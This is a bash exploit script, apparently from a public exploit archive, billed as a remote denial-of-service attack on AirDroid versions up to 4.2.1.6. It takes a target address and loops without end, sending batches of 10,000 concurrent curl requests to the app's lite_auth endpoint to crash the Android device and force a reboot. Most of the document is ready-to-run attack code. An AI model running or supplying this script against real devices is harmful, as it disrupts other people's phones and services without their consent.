42 lines
No EOL
1.3 KiB
Bash
Executable file
42 lines
No EOL
1.3 KiB
Bash
Executable file
#!/bin/bash
|
|
|
|
# *********************************************************************
|
|
# * Author: Marcelo Vázquez (aka s4vitar) *
|
|
# * AirDroid Denial of Service (DoS) & System Crash + Forced Reboot *
|
|
# *********************************************************************
|
|
|
|
# Exploit Title: AirDroid Remote Denial of Service (DoS) & System Crash + Forced Reboot
|
|
# Date: 2019-02-13
|
|
# Exploit Author: Marcelo Vázquez (aka s4vitar)
|
|
# Collaborators: Victor Lasa (aka vowkin)
|
|
# Vendor Homepage: https://web.airdroid.com/
|
|
# Software Link: https://play.google.com/store/apps/details?id=com.sand.airdroid&hl=en
|
|
# Version: <= AirDroid 4.2.1.6
|
|
# Tested on: Android
|
|
|
|
url=$1 # Example: http://192.168.1.46:8888
|
|
requests=0
|
|
|
|
trap ctrl_c INT
|
|
|
|
# If Ctrl+C key is pressed then the threads are killed
|
|
function ctrl_c() {
|
|
echo -e "\n\n[*]Exiting...\n" && tput cnorm
|
|
pkill curl > /dev/null 2>&1
|
|
exit
|
|
}
|
|
|
|
# Detect number of arguments being passed to the program
|
|
if [ "$(echo $#)" == "1" ]; then
|
|
# Infinite Loop
|
|
tput cnorm && while true; do
|
|
# We send 10000 requests in thread
|
|
for i in $(seq 1 10000); do
|
|
curl --silent "$url/sdctl/comm/lite_auth/" &
|
|
let requests+=1
|
|
done && wait # Here we wait for the threads to finish
|
|
echo "Requests Sent: $requests"
|
|
done
|
|
else
|
|
echo -e "\nUsage: ./AirDroid_request.sh http://ip:port\n"
|
|
fi |